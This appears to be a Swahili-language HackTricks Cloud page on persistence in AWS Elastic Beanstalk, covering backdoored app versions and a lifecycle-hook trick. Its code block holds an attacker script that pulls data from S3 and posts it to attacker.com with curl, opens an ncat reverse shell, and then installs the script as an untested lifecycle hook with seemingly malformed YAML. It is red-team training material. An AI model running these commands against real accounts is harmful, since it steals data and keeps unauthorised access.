Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - Elastic Beanstalk Persistence

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Elastic Beanstalk

Kwa habari zaidi angalia:

pageAWS - Elastic Beanstalk Enum

Uthabiti kwenye Kifaa

Ili kudumisha uthabiti ndani ya akaunti ya AWS, baadhi ya mifumo ya uthabiti inaweza kuingizwa ndani ya kifaa (kazi ya cron, ufunguo wa ssh...) ili muhusika aweze kufikia na kuiba sifa za jukumu la IAM kutoka kwa huduma ya metadata.

Mlango wa Nyuma kwenye Toleo

Mshambuliaji anaweza kuweka mlango wa nyuma kwenye nambari ndani ya repo ya S3 ili iendelee kutekeleza mlango wake wa nyuma na nambari inayotarajiwa.

Toleo Jipya lenye Mlango wa Nyuma

Badala ya kubadilisha nambari kwenye toleo halisi, mshambuliaji anaweza kupeleka toleo jipya lenye mlango wa nyuma wa programu.

Kutumia Kitanzi cha Maisha cha Malipo ya Rasilimali za Desturi

TODO: Jaribu

Elastic Beanstalk hutoa vitanzi vya maisha vinavyokuwezesha kukimbia hati za desturi wakati wa utoaji na kufutwa kwa kifaa. Mshambuliaji anaweza kuwezesha kitanzi cha maisha kutekeleza mara kwa mara hati ambayo inaondoa data au inadumisha ufikiaji wa akaunti ya AWS.

bashCopy code# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

PreviousAWS - ECS PersistenceNextAWS - EFS Persistence

Last updated